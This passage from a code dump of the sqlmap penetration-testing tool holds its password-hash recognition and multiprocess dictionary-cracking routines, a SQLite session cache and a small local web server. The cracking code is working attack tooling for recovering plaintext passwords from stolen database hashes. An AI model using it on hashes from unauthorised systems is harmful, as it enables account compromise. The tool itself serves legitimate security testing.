columns:\n                    if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i):\n                        value = table[column]['values'][i]\n\n                        if value and value.lower() in lut:\n                            table[column]['values'][i] = \"%s (%s)\" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER))\n                            table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))\n\ndef hashRecognition(value):\n    \"\"\"\n    >>> hashRecognition(\"179ad45c6ce2cb97cf1029e212046e81\") == HASH.MD5_GENERIC\n    True\n    >>> hashRecognition(\"S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C\") == HASH.ORACLE\n    True\n    >>> hashRecognition(\"foobar\") == None\n    True\n    \"\"\"\n\n    retVal = None\n\n    if value and len(value) >= 8 and ' ' not in value:   # Note: pre-filter condition (for optimization purposes)\n        isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL)\n\n        if kb.cache.hashRegex is None:\n            parts = []\n\n            for name, regex in getPublicTypeMembers(HASH):\n                # Hashes for Oracle and old MySQL look the same hence these checks\n                if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD:\n                    continue\n                elif regex == HASH.CRYPT_GENERIC:\n                    if any((value.lower() == value, value.upper() == value)):\n                        continue\n                else:\n                    parts.append(\"(?P<%s>%s)\" % (name, regex))\n\n            kb.cache.hashRegex = ('|'.join(parts)).replace(\"(?i)\", \"\")\n\n        if isinstance(value, six.string_types):\n            match = re.search(kb.cache.hashRegex, value, re.I)\n            if match:\n                algorithm, _ = [_ for _ in match.groupdict().items() if _[1] is not None][0]\n                retVal = getattr(HASH, algorithm)\n\n    return retVal\n\ndef _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api):\n    if IS_WIN:\n        coloramainit()\n\n    count = 0\n    rotator = 0\n    hashes = set(item[0][1] for item in attack_info)\n\n    wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, \"value\", 0), custom_wordlist)\n\n    try:\n        for word in wordlist:\n            if not attack_info:\n                break\n\n            count += 1\n\n            if isinstance(word, six.binary_type):\n                word = getUnicode(word)\n            elif not isinstance(word, six.string_types):\n                continue\n\n            if suffix:\n                word = word + suffix\n\n            try:\n                current = __functions__[hash_regex](password=word, uppercase=False)\n\n                if current in hashes:\n                    for item in attack_info[:]:\n                        ((user, hash_), _) = item\n\n                        if hash_ == current:\n                            retVal.put((user, hash_, word))\n\n                            clearConsoleLine()\n\n                            infoMsg = \"\\r[%s] [INFO] cracked password '%s'\" % (time.strftime(\"%X\"), word)\n\n                            if user and not user.startswith(DUMMY_USER_PREFIX):\n                                infoMsg += \" for user '%s'\\n\" % user\n                            else:\n                                infoMsg += \" for hash '%s'\\n\" % hash_\n\n                            dataToStdout(infoMsg, True)\n\n                            attack_info.remove(item)\n\n                elif (proc_id == 0 or getattr(proc_count, \"value\", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN:\n                    rotator += 1\n\n                    if rotator >= len(ROTATING_CHARS):\n                        rotator = 0\n\n                    status = \"current status: %s... %s\" % (word.ljust(5)[:5], ROTATING_CHARS[rotator])\n\n                    if not api:\n                        dataToStdout(\"\\r[%s] [INFO] %s\" % (time.strftime(\"%X\"), status))\n\n            except KeyboardInterrupt:\n                raise\n\n            except (UnicodeEncodeError, UnicodeDecodeError):\n                pass  # ignore possible encoding problems caused by some words in custom dictionaries\n\n            except Exception as ex:\n                warnMsg = \"there was a problem while hashing entry: %s ('%s'). \" % (repr(word), getSafeExString(ex))\n                warnMsg += \"Please report by e-mail to '%s'\" % DEV_EMAIL_ADDRESS\n                logger.critical(warnMsg)\n\n    except KeyboardInterrupt:\n        pass\n\n    finally:\n        if hasattr(proc_count, \"value\"):\n            with proc_count.get_lock():\n                proc_count.value -= 1\n\ndef _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api):\n    if IS_WIN:\n        coloramainit()\n\n    count = 0\n    rotator = 0\n\n    wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, \"value\", 0), custom_wordlist)\n\n    try:\n        for word in wordlist:\n            if found.value:\n                break\n\n            count += 1\n\n            if isinstance(word, six.binary_type):\n                word = getUnicode(word)\n            elif not isinstance(word, six.string_types):\n                continue\n\n            if suffix:\n                word = word + suffix\n\n            try:\n                current = __functions__[hash_regex](password=word, uppercase=False, **kwargs)\n\n                if hash_ == current:\n                    if hash_regex == HASH.ORACLE_OLD:  # only for cosmetic purposes\n                        word = word.upper()\n\n                    retVal.put((user, hash_, word))\n\n                    clearConsoleLine()\n\n                    infoMsg = \"\\r[%s] [INFO] cracked password '%s'\" % (time.strftime(\"%X\"), word)\n\n                    if user and not user.startswith(DUMMY_USER_PREFIX):\n                        infoMsg += \" for user '%s'\\n\" % user\n                    else:\n                        infoMsg += \" for hash '%s'\\n\" % hash_\n\n                    dataToStdout(infoMsg, True)\n\n                    found.value = True\n\n                elif (proc_id == 0 or getattr(proc_count, \"value\", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0:\n                    rotator += 1\n\n                    if rotator >= len(ROTATING_CHARS):\n                        rotator = 0\n\n                    status = \"current status: %s... %s\" % (word.ljust(5)[:5], ROTATING_CHARS[rotator])\n\n                    if user and not user.startswith(DUMMY_USER_PREFIX):\n                        status += \" (user: %s)\" % user\n\n                    if not api:\n                        dataToStdout(\"\\r[%s] [INFO] %s\" % (time.strftime(\"%X\"), status))\n\n            except KeyboardInterrupt:\n                raise\n\n            except (UnicodeEncodeError, UnicodeDecodeError):\n                pass  # ignore possible encoding problems caused by some words in custom dictionaries\n\n            except Exception as ex:\n                warnMsg = \"there was a problem while hashing entry: %s ('%s'). \" % (repr(word), getSafeExString(ex))\n                warnMsg += \"Please report by e-mail to '%s'\" % DEV_EMAIL_ADDRESS\n                logger.critical(warnMsg)\n\n    except KeyboardInterrupt:\n        pass\n\n    finally:\n        if hasattr(proc_count, \"value\"):\n            with proc_count.get_lock():\n                proc_count.value -= 1\n\ndef dictionaryAttack(attack_dict):\n    global _multiprocessing\n\n    suffix_list = [\"\"]\n    custom_wordlist = [\"\"]\n    hash_regexes = []\n    results = []\n    resumes = []\n    user_hash = []\n    processException = False\n    foundHash = False\n\n    if conf.disableMulti:\n        _multiprocessing = None\n    else:\n        # Note: https://github.com/sqlmapproject/sqlmap/issues/4367\n        try:\n            import multiprocessing\n\n            # problems on FreeBSD (Reference: https://web.archive.org/web/20110710041353/http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx)\n            _ = multiprocessing.Queue()\n\n            # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952)\n            _ = multiprocessing.Value('i')\n        except (ImportError, OSError, AttributeError):\n            pass\n        else:\n            try:\n                if multiprocessing.cpu_count() > 1:\n                    _multiprocessing = multiprocessing\n            except NotImplementedError:\n                pass\n\n    for (_, hashes) in attack_dict.items():\n        for hash_ in hashes:\n            if not hash_:\n                continue\n\n            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_\n            regex = hashRecognition(hash_)\n\n            if regex and regex not in hash_regexes:\n                hash_regexes.append(regex)\n                infoMsg = \"using hash method '%s'\" % __functions__[regex].__name__\n                logger.info(infoMsg)\n\n    for hash_regex in hash_regexes:\n        keys = set()\n        attack_info = []\n\n        for (user, hashes) in attack_dict.items():\n            for hash_ in hashes:\n                if not hash_:\n                    continue\n\n                foundHash = True\n                hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_\n\n                if re.match(hash_regex, hash_):\n                    try:\n                        item = None\n\n                        if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.PHPASS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64):\n                            hash_ = hash_.lower()\n\n                        if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64):\n                            item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}]\n                        elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1):\n                            if hash_.startswith(\"0x\"):  # Reference: https://docs.microsoft.com/en-us/sql/t-sql/functions/hashbytes-transact-sql?view=sql-server-2017\n                                hash_ = hash_[2:]\n                            item = [(user, hash_), {}]\n                        elif hash_regex in (HASH.SSHA,):\n                            item = [(user, hash_), {\"salt\": decodeBase64(hash_, binary=True)[20:]}]\n                        elif hash_regex in (HASH.SSHA256,):\n                            item = [(user, hash_), {\"salt\": decodeBase64(hash_, binary=True)[32:]}]\n                        elif hash_regex in (HASH.SSHA512,):\n                            item = [(user, hash_), {\"salt\": decodeBase64(hash_, binary=True)[64:]}]\n                        elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):\n                            item = [(user, hash_), {'username': user}]\n                        elif hash_regex in (HASH.ORACLE,):\n                            item = [(user, hash_), {\"salt\": hash_[-20:]}]\n                        elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW):\n                            item = [(user, hash_), {\"salt\": hash_[6:14]}]\n                        elif hash_regex in (HASH.CRYPT_GENERIC,):\n                            item = [(user, hash_), {\"salt\": hash_[0:2]}]\n                        elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT):\n                            item = [(user, hash_), {\"salt\": hash_.split('$')[2], \"magic\": \"$%s$\" % hash_.split('$')[1]}]\n                        elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD):\n                            item = [(user, hash_), {\"salt\": hash_.split(':')[-1]}]\n                        elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1):\n                            item = [(user, hash_), {\"salt\": hash_.split('$')[1]}]\n                        elif hash_regex in (HASH.PHPASS,):\n                            if ITOA64.index(hash_[3]) < 32:\n                                item = [(user, hash_), {\"salt\": hash_[4:12], \"count\": 1 << ITOA64.index(hash_[3]), \"prefix\": hash_[:3]}]\n                            else:\n                                warnMsg = \"invalid hash '%s'\" % hash_\n                                logger.warning(warnMsg)\n\n                        if item and hash_ not in keys:\n                            resumed = hashDBRetrieve(hash_)\n                            if not resumed:\n                                attack_info.append(item)\n                                user_hash.append(item[0])\n                            else:\n                                infoMsg = \"resuming password '%s' for hash '%s'\" % (resumed, hash_)\n                                if user and not user.startswith(DUMMY_USER_PREFIX):\n                                    infoMsg += \" for user '%s'\" % user\n                                logger.info(infoMsg)\n                                resumes.append((user, hash_, resumed))\n                            keys.add(hash_)\n\n                    except (binascii.Error, TypeError, IndexError):\n                        pass\n\n        if not attack_info:\n            continue\n\n        if not kb.wordlists:\n            while not kb.wordlists:\n\n                # the slowest of all methods hence smaller default dict\n                if hash_regex in (HASH.ORACLE_OLD, HASH.PHPASS):\n                    dictPaths = [paths.SMALL_DICT]\n                else:\n                    dictPaths = [paths.WORDLIST]\n\n                message = \"what dictionary do you want to use?\\n\"\n                message += \"[1] default dictionary file '%s' (press Enter)\\n\" % dictPaths[0]\n                message += \"[2] custom dictionary file\\n\"\n                message += \"[3] file with list of dictionary files\"\n                choice = readInput(message, default='1')\n\n                try:\n                    if choice == '2':\n                        message = \"what's the custom dictionary's location?\\n\"\n                        dictPath = readInput(message)\n                        if dictPath:\n                            dictPaths = [dictPath]\n                            logger.info(\"using custom dictionary\")\n                    elif choice == '3':\n                        message = \"what's the list file location?\\n\"\n                        listPath = readInput(message)\n                        checkFile(listPath)\n                        dictPaths = getFileItems(listPath)\n                        logger.info(\"using custom list of dictionaries\")\n                    else:\n                        logger.info(\"using default dictionary\")\n\n                    dictPaths = [_ for _ in dictPaths if _]\n\n                    for dictPath in dictPaths:\n                        checkFile(dictPath)\n\n                        if isZipFile(dictPath):\n                            _ = zipfile.ZipFile(dictPath, 'r')\n                            if len(_.namelist()) == 0:\n                                errMsg = \"no file(s) inside '%s'\" % dictPath\n                                raise SqlmapDataException(errMsg)\n                            else:\n                                _.open(_.namelist()[0])\n\n                    kb.wordlists = dictPaths\n\n                except Exception as ex:\n                    warnMsg = \"there was a problem while loading dictionaries\"\n                    warnMsg += \" ('%s')\" % getSafeExString(ex)\n                    logger.critical(warnMsg)\n\n            message = \"do you want to use common password suffixes? (slow!) [y/N] \"\n\n            if readInput(message, default='N', boolean=True):\n                suffix_list += COMMON_PASSWORD_SUFFIXES\n\n        infoMsg = \"starting dictionary-based cracking (%s)\" % __functions__[hash_regex].__name__\n        logger.info(infoMsg)\n\n        for item in attack_info:\n            ((user, _), _) = item\n            if user and not user.startswith(DUMMY_USER_PREFIX):\n                custom_wordlist.append(normalizeUnicode(user))\n\n        # Algorithms without extra arguments (e.g. salt and/or username)\n        if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1):\n            for suffix in suffix_list:\n                if not attack_info or processException:\n                    break\n\n                if suffix:\n                    clearConsoleLine()\n                    infoMsg = \"using suffix '%s'\" % suffix\n                    logger.info(infoMsg)\n\n                retVal = None\n                processes = []\n\n                try:\n                    if _multiprocessing:\n                        if _multiprocessing.cpu_count() > 1:\n                            infoMsg = \"starting %d processes \" % _multiprocessing.cpu_count()\n                            singleTimeLogMessage(infoMsg)\n\n                        gc.disable()\n\n                        retVal = _multiprocessing.Queue()\n                        count = _multiprocessing.Value('i', _multiprocessing.cpu_count())\n\n                        for i in xrange(_multiprocessing.cpu_count()):\n                            process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api))\n                            processes.append(process)\n\n                        for process in processes:\n                            process.daemon = True\n                            process.start()\n\n                        while count.value > 0:\n                            time.sleep(0.5)\n\n                    else:\n                        warnMsg = \"multiprocessing hash cracking is currently \"\n                        warnMsg += \"%s on this platform\" % (\"not supported\" if not conf.disableMulti else \"disabled\")\n                        singleTimeWarnMessage(warnMsg)\n\n                        retVal = _queue.Queue()\n                        _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api)\n\n                except KeyboardInterrupt:\n                    print()\n                    processException = True\n                    warnMsg = \"user aborted during dictionary-based attack phase (Ctrl+C was pressed)\"\n                    logger.warning(warnMsg)\n\n                finally:\n                    _finalize(retVal, results, processes, attack_info)\n\n            clearConsoleLine()\n\n        else:\n            for ((user, hash_), kwargs) in attack_info:\n                if processException:\n                    break\n\n                if any(_[0] == user and _[1] == hash_ for _ in results):\n                    continue\n\n                count = 0\n                found = False\n\n                for suffix in suffix_list:\n                    if found or processException:\n                        break\n\n                    if suffix:\n                        clearConsoleLine()\n                        infoMsg = \"using suffix '%s'\" % suffix\n                        logger.info(infoMsg)\n\n                    retVal = None\n                    processes = []\n\n                    try:\n                        if _multiprocessing:\n                            if _multiprocessing.cpu_count() > 1:\n                                infoMsg = \"starting %d processes \" % _multiprocessing.cpu_count()\n                                singleTimeLogMessage(infoMsg)\n\n                            gc.disable()\n\n                            retVal = _multiprocessing.Queue()\n                            found_ = _multiprocessing.Value('i', False)\n                            count = _multiprocessing.Value('i', _multiprocessing.cpu_count())\n\n                            for i in xrange(_multiprocessing.cpu_count()):\n                                process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api))\n                                processes.append(process)\n\n                            for process in processes:\n                                process.daemon = True\n                                process.start()\n\n                            while count.value > 0:\n                                time.sleep(0.5)\n\n                            found = found_.value != 0\n\n                        else:\n                            warnMsg = \"multiprocessing hash cracking is currently \"\n                            warnMsg += \"%s on this platform\" % (\"not supported\" if not conf.disableMulti else \"disabled\")\n                            singleTimeWarnMessage(warnMsg)\n\n                            class Value(object):\n                                pass\n\n                            retVal = _queue.Queue()\n                            found_ = Value()\n                            found_.value = False\n\n                            _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api)\n\n                            found = found_.value\n\n                    except KeyboardInterrupt:\n                        print()\n                        processException = True\n                        warnMsg = \"user aborted during dictionary-based attack phase (Ctrl+C was pressed)\"\n                        logger.warning(warnMsg)\n\n                        for process in processes:\n                            try:\n                                process.terminate()\n                                process.join()\n                            except (OSError, AttributeError):\n                                pass\n\n                    finally:\n                        _finalize(retVal, results, processes, attack_info)\n\n                clearConsoleLine()\n\n    results.extend(resumes)\n\n    if foundHash and len(hash_regexes) == 0:\n        warnMsg = \"unknown hash format\"\n        logger.warning(warnMsg)\n\n    if len(results) == 0:\n        warnMsg = \"no clear password(s) found\"\n        logger.warning(warnMsg)\n\n    return results\n\ndef crackHashFile(hashFile):\n    i = 0\n    attack_dict = {}\n\n    for line in getFileItems(conf.hashFile):\n        if ':' in line:\n            user, hash_ = line.split(':', 1)\n            attack_dict[user] = [hash_]\n        else:\n            attack_dict[\"%s%d\" % (DUMMY_USER_PREFIX, i)] = [line]\n            i += 1\n\n    dictionaryAttack(attack_dict)\n"
  },
  {
    "path": "sqlmap/lib/utils/hashdb.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport hashlib\nimport os\nimport sqlite3\nimport threading\nimport time\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import serializeObject\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unserializeObject\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.settings import HASHDB_END_TRANSACTION_RETRIES\nfrom lib.core.settings import HASHDB_FLUSH_RETRIES\nfrom lib.core.settings import HASHDB_FLUSH_THRESHOLD\nfrom lib.core.settings import HASHDB_RETRIEVE_RETRIES\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import getCurrentThreadName\nfrom thirdparty import six\n\nclass HashDB(object):\n    def __init__(self, filepath):\n        self.filepath = filepath\n        self._write_cache = {}\n        self._cache_lock = threading.Lock()\n        self._connections = []\n\n    def _get_cursor(self):\n        threadData = getCurrentThreadData()\n\n        if threadData.hashDBCursor is None:\n            try:\n                connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None)\n                self._connections.append(connection)\n                threadData.hashDBCursor = connection.cursor()\n                threadData.hashDBCursor.execute(\"CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)\")\n                connection.commit()\n            except Exception as ex:\n                errMsg = \"error occurred while opening a session \"\n                errMsg += \"file '%s' ('%s')\" % (self.filepath, getSafeExString(ex))\n                raise SqlmapConnectionException(errMsg)\n\n        return threadData.hashDBCursor\n\n    def _set_cursor(self, cursor):\n        threadData = getCurrentThreadData()\n        threadData.hashDBCursor = cursor\n\n    cursor = property(_get_cursor, _set_cursor)\n\n    def close(self):\n        threadData = getCurrentThreadData()\n        try:\n            if threadData.hashDBCursor:\n                threadData.hashDBCursor.connection.commit()\n                threadData.hashDBCursor.close()\n                threadData.hashDBCursor.connection.close()\n                threadData.hashDBCursor = None\n        except:\n            pass\n\n    def closeAll(self):\n        for connection in self._connections:\n            try:\n                connection.commit()\n                connection.close()\n            except:\n                pass\n\n    @staticmethod\n    def hashKey(key):\n        key = getBytes(key if isinstance(key, six.text_type) else repr(key), errors=\"xmlcharrefreplace\")\n        retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff  # Reference: http://stackoverflow.com/a/4448400\n        return retVal\n\n    def retrieve(self, key, unserialize=False):\n        retVal = None\n\n        if key and (self._write_cache or os.path.isfile(self.filepath)):\n            hash_ = HashDB.hashKey(key)\n            retVal = self._write_cache.get(hash_)\n            if not retVal:\n                for _ in xrange(HASHDB_RETRIEVE_RETRIES):\n                    try:\n                        for row in self.cursor.execute(\"SELECT value FROM storage WHERE id=?\", (hash_,)):\n                            retVal = row[0]\n                    except (sqlite3.OperationalError, sqlite3.DatabaseError) as ex:\n                        if any(_ in getSafeExString(ex) for _ in (\"locked\", \"no such table\")):\n                            warnMsg = \"problem occurred while accessing session file '%s' ('%s')\" % (self.filepath, getSafeExString(ex))\n                            singleTimeWarnMessage(warnMsg)\n                        elif \"Could not decode\" in getSafeExString(ex):\n                            break\n                        else:\n                            errMsg = \"error occurred while accessing session file '%s' ('%s'). \" % (self.filepath, getSafeExString(ex))\n                            errMsg += \"If the problem persists please rerun with '--flush-session'\"\n                            raise SqlmapConnectionException(errMsg)\n                    else:\n                        break\n\n                    time.sleep(1)\n\n        if retVal and unserialize:\n            try:\n                retVal = unserializeObject(retVal)\n            except:\n                retVal = None\n                warnMsg = \"error occurred while unserializing value for session key '%s'. \" % key\n                warnMsg += \"If the problem persists please rerun with '--flush-session'\"\n                logger.warning(warnMsg)\n\n        return retVal\n\n    def write(self, key, value, serialize=False):\n        if key:\n            hash_ = HashDB.hashKey(key)\n            self._cache_lock.acquire()\n            self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)\n            self._cache_lock.release()\n\n        if getCurrentThreadName() in ('0', \"MainThread\"):\n            self.flush()\n\n    def flush(self, forced=False):\n        if not self._write_cache:\n            return\n\n        if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD:\n            return\n\n        self._cache_lock.acquire()\n        _ = self._write_cache\n        self._write_cache = {}\n        self._cache_lock.release()\n\n        try:\n            self.beginTransaction()\n            for hash_, value in _.items():\n                retries = 0\n                while True:\n                    try:\n                        try:\n                            self.cursor.execute(\"INSERT INTO storage VALUES (?, ?)\", (hash_, value,))\n                        except sqlite3.IntegrityError:\n                            self.cursor.execute(\"UPDATE storage SET value=? WHERE id=?\", (value, hash_,))\n                    except (UnicodeError, OverflowError):  # e.g. surrogates not allowed (Issue #3851)\n                        break\n                    except sqlite3.DatabaseError as ex:\n                        if not os.path.exists(self.filepath):\n                            debugMsg = \"session file '%s' does not exist\" % self.filepath\n                            logger.debug(debugMsg)\n                            break\n\n                        if retries == 0:\n                            warnMsg = \"there has been a problem while writing to \"\n                            warnMsg += \"the session file ('%s')\" % getSafeExString(ex)\n                            logger.warning(warnMsg)\n\n                        if retries >= HASHDB_FLUSH_RETRIES:\n                            return\n                        else:\n                            retries += 1\n                            time.sleep(1)\n                    else:\n                        break\n        finally:\n            self.endTransaction()\n\n    def beginTransaction(self):\n        threadData = getCurrentThreadData()\n        if not threadData.inTransaction:\n            try:\n                self.cursor.execute(\"BEGIN TRANSACTION\")\n            except:\n                # Reference: http://stackoverflow.com/a/25245731\n                self.cursor.close()\n                threadData.hashDBCursor = None\n                self.cursor.execute(\"BEGIN TRANSACTION\")\n            finally:\n                threadData.inTransaction = True\n\n    def endTransaction(self):\n        threadData = getCurrentThreadData()\n        if threadData.inTransaction:\n            retries = 0\n            while retries < HASHDB_END_TRANSACTION_RETRIES:\n                try:\n                    self.cursor.execute(\"END TRANSACTION\")\n                    threadData.inTransaction = False\n                except sqlite3.OperationalError:\n                    pass\n                except sqlite3.ProgrammingError:\n                    self.cursor = None\n                    threadData.inTransaction = False\n                    return\n                else:\n                    return\n\n                retries += 1\n                time.sleep(1)\n\n            try:\n                self.cursor.execute(\"ROLLBACK TRANSACTION\")\n            except sqlite3.OperationalError:\n                self.cursor.close()\n                self.cursor = None\n            finally:\n                threadData.inTransaction = False\n"
  },
  {
    "path": "sqlmap/lib/utils/httpd.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport mimetypes\nimport gzip\nimport os\nimport re\nimport sys\nimport threading\nimport time\nimport traceback\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\")))\n\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import VERSION_STRING\nfrom thirdparty import six\nfrom thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import socketserver as _socketserver\nfrom thirdparty.six.moves import urllib as _urllib\n\nHTTP_ADDRESS = \"0.0.0.0\"\nHTTP_PORT = 8951\nDEBUG = True\nHTML_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"data\", \"html\"))\nDISABLED_CONTENT_EXTENSIONS = (\".py\", \".pyc\", \".md\", \".txt\", \".bak\", \".conf\", \".zip\", \"~\")\n\nclass ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer):\n    def finish_request(self, *args, **kwargs):\n        try:\n            _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)\n        except Exception:\n            if DEBUG:\n                traceback.print_exc()\n\nclass ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler):\n    def do_GET(self):\n        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, \"\")\n        params = {}\n        content = None\n\n        if query:\n            params.update(_urllib.parse.parse_qs(query))\n\n        for key in params:\n            if params[key]:\n                params[key] = params[key][-1]\n\n        self.url, self.params = path, params\n\n        if path == '/':\n            path = \"index.html\"\n\n        path = path.strip('/')\n\n        path = path.replace('/', os.path.sep)\n        path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()\n\n        if not os.path.isfile(path) and os.path.isfile(\"%s.html\" % path):\n            path = \"%s.html\" % path\n\n        if \"..\" not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and not path.endswith(DISABLED_CONTENT_EXTENSIONS):\n            content = open(path, \"rb\").read()\n            self.send_response(_http_client.OK)\n            self.send_header(HTTP_HEADER.CONNECTION, \"close\")\n            self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or \"application/octet-stream\")\n        else:\n            content = (\"<!DOCTYPE html><html lang=\\\"en\\\"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>\" % self.path.split('?')[0]).encode(UNICODE_ENCODING)\n            self.send_response(_http_client.NOT_FOUND)\n            self.send_header(HTTP_HEADER.CONNECTION, \"close\")\n\n        if content is not None:\n            for match in re.finditer(b\"<!(\\\\w+)!>\", content):\n                name = match.group(1)\n                _ = getattr(self, \"_%s\" % name.lower(), None)\n                if _:\n                    content = self._format(content, **{name: _()})\n\n            if \"gzip\" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING):\n                self.send_header(HTTP_HEADER.CONTENT_ENCODING, \"gzip\")\n                _ = six.BytesIO()\n                compress = gzip.GzipFile(\"\", \"w+b\", 9, _)\n                compress._stream = _\n                compress.write(content)\n                compress.flush()\n                compress.close()\n                content = compress._stream.getvalue()\n\n            self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))\n\n        self.end_headers()\n\n        if content:\n            self.wfile.write(content)\n\n        self.wfile.flush()\n\n    def _format(self, content, **params):\n        if content:\n            for key, value in params.items():\n                content = content.replace(\"<!%s!>\" % key, value)\n\n        return content\n\n    def version_string(self):\n        return VERSION_STRING\n\n    def log_message(self, format, *args):\n        return\n\n    def finish(self):\n        try:\n            _BaseHTTPServer.BaseHTTPRequestHandler.finish(self)\n        except Exception:\n            if DEBUG:\n                traceback.print_exc()\n\ndef start_httpd():\n    server = ThreadingServer((HTTP_ADDRESS, HTTP_PORT), ReqHandler)\n    thread = threading.Thread(target=server.serve_forever)\n    thread.daemon = True\n    thread.start()\n\n    print(\"[i] running HTTP server at '%s:%d'\" % (HTTP_ADDRESS, HTTP_PORT))\n\nif __name__ == \"__main__\":\n    try:\n        start_httpd()\n\n        while True:\n            time.sleep(1)\n    except KeyboardInterrupt:\n        pass\n"
  },
  {
    "path": "sqlmap/lib/utils/pivotdumptable.py",
